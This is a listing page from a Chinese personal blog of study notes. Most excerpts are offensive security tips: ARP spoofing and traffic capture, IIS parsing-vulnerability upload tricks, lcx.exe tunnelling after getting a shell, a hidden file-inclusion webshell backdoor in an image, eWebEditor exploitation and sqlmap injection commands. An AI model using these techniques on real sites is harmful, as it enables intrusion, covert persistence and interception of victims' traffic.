小米手环3 升级失败解决方法

Adian | 学习笔记 | 2018-07-09
最近入手了小米手环3 其实我觉得颜值相比2并没有提升 小米一如既往的采取饥饿营销,我七月份了才拿到了手环3 就在这个欢喜的日子的前几天,我的小米手机被没收了 嗯,还停了我两天课 于是我拿出我的荣耀5A下载了小米运动开始鼓捣 但是一直会出现更新失败的情况 总是到百分之十就提示失败,要我靠近一些 Excuse me??我都直接放手机屏幕上了好吗?? 思前想后 我试了不下十遍 难道 [阅读全文]
ė652次浏览 64条评论 0 小米手环

记一次坦白说寻找好友QQ

Adian | 学习笔记 | 2018-05-22
可能是在坦白说遭到了鄙视。。。 -------------------------------------   猜测了良久究竟是谁 然后想起了十三年社团站貌似又文章 所以 参考文献:http://www.klmyssn.com/?post=102 按照文献提供的方法,成功的获取到了密文 具体操作参考文献已经写的十分详尽了,我自认为没有那么好的文笔,所以就不赘述了 但 [阅读全文]
ė308次浏览 61条评论 0

Win10子系统运行Kali linux进行渗透测试

Adian | 学习笔记 | 2018-05-20
前言:因为贫穷,我买了一台杂牌笔记本(有键盘的win10pad) 然后我苦逼的发现我并无法安装上kali linux 我尝试过使用Pentestbox,但是实在是用的很不习惯,而且MSF的更新实在是很麻烦,折腾了两天,发现Win10自带子系统 子系统打开方式https://jingyan.baidu.com/article/624e74596633a034e8ba5a2b.html 我 [阅读全文]
ė425次浏览 61条评论 0

[转]一个对指定网站的渗透思路

Adian | 学习笔记 | 2016-08-12
恩,我是萌萌哒A.   [阅读全文]
ė252次浏览 60条评论 0

简单的Kali使用备忘

Adian | 学习笔记 | 2016-07-22
断网攻击 Arpspoof  -i 网卡 -t 目标IP 网关 Fping -asg 192.168.1.0/24 ==>查看内网ip 开启内网流量转发 echo 1 >/proc/sys/net/ipv4(6)/ip_forward 获取被欺骗者浏览的图片 driftnet -i eth0 (网卡 [阅读全文]
ė140次浏览 60条评论 0

解析漏洞总结

Adian | 学习笔记 | 2016-07-15
IIS6.0搭建平台 1.文件命名 正常命名文件 logo.jpg 触发解析漏洞命名 logo.asp;.xx.jpg(xx可有可无,任意字符) 2.文件夹命名 正常文件夹路径 ../image/qq.jpg 触发解析漏洞文件路径 ../image.asp/qq.jpg IIS7.x uginx低版本 [阅读全文]
ė196次浏览 60条评论 0

使用lcx.exe进行内网转发

Adian | 学习笔记 | 2016-07-05
在Getshell后 上传lcx.exe 然后执行 lcx.exe -salve x.x.x.x 3389(外网ip和转发的端口) x.x.x.x 1234(内网ip和远程端口)   本机运行 lcx.exe -listen 1234 2000 然后连接127.0.0.1:2000 [阅读全文]
ė183次浏览 61条评论 0

文件包含维持后门权限

Adian | 学习笔记 | 2016-07-02
在必备图片中插入一句话(logo等) 在正常页面进行文件包含(index.php login.php) $x=$_GET['x']; include($x); 站长不会神经病似的去看图片中是否含有后门代码 于是打开正常页面http://www.xxxx.com/news.php?x=xxxxxx.jpg 即可用菜刀链接 [阅读全文]
ė197次浏览 60条评论 0

编辑器漏洞利用

Adian | 学习笔记 | 2016-06-30
 eweb编辑器漏洞 编辑器漏洞利用核心:获取编辑器地址 1.Ewebeditor编辑器漏洞利用过程:获取编辑器地址,尝试获取编辑器后台地址,尝试默认账号密码登陆,如登陆失败可尝试下载默认数据库,破解其账号密码,登陆后台,尝试添加上传类型,如无确认按钮,可新增样式,新增插入图片,浏览上传,获取后门地址。 默认后台地址:ewebeditor/admin_l [阅读全文]
ė189次浏览 60条评论 0

使用sqlmap进行简单注入

Adian | 学习笔记 | 2016-06-29
教程文本里面有,我就复制一下备忘了 后台post注入: sqlmap.py -u http://127.0.0.1:88/p.php --data "u=admin&p=123456"   //判断注入 sqlmap.py -u http://127.0.0.1:88/p.php --data "u=admin&p=123456" -- [阅读全文]
ė264次浏览 60条评论 0